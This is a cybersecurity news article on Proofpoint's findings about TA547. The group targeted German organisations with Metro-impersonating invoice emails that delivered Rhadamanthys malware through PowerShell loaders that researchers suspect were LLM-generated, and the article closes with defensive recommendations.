The threat actor, TA547, is targeting German organisations, including Metro, showcasing sophisticated techniques, including delivering Rhadamanthys malware via suspected large language model (LLM)-generated scripts.
TA547, known for its financially motivated cybercriminal activities, has historically operated as an initial access broker (IAB), targeting various geographic regions. Since 2023, the group primarily distributed NetSupportRAT but has diversified its payloads, occasionally utilising StealC and Lumma Stealer, similar information stealers to Rhadamanthys.
The analysis revealed that TA547’s campaign revolved around emails impersonating the reputable German retail company Metro. These emails, seemingly related to invoicing matters, contained a password-protected ZIP file housing the LNK file.
Upon execution, the LNK file initiated a remote PowerShell script, which, in turn, decoded and executed the Rhadamanthys malware in memory. This approach allows the threat actor to bypass traditional detection mechanisms that rely on disk-based analysis, highlighting the sophistication of their tactics.
One of the standout features of this campaign was the suspected use of a PowerShell script generated by large language models (LLMs) such as ChatGPT, Gemini and CoPilot. The script exhibited unique characteristics, including grammatically correct comments preceding each script component — a hallmark of machine-generated content.
“Notably, when deobfuscated, the second PowerShell script that was used to load Rhadamanthys contained interesting characteristics not commonly observed in code used by threat actors (or legitimate programmers). Specifically, the PowerShell script included a pound sign followed by grammatically correct and hyper-specific comments above each component of the script,” said the researchers.
This suggests that TA547 either leveraged LLM-enabled tools directly or sourced code from a repository utilising such tools, showcasing a novel integration of AI-generated content in cybercrime operations.
“While it is difficult to confirm whether malicious content is created via LLMs – from malware scripts to social engineering lures – there are characteristics of such content that point to machine-generated rather than human-generated information. Regardless of whether it is human or machine-generated, the defence against such threats remains the same,” researchers noted.
Cybersecurity experts from Proofpoint exposed the recent campaign by TA547, which shed light on evolving cyber threats and the adaptability of malicious actors.
Researchers have noted that LLMs can assist threat actors in initiating sophisticated attacks. However, the use of LLMs does not change the efficacy of the malware or the ability of the security defender tools to detect them.
Proofpoint has urged organisations to enhance their cybersecurity posture by implementing robust email security measures, behaviour-based threat detection, and regular employee security awareness training.
In the News: Redis servers exploited to install Metasploit Meterpreter backdoor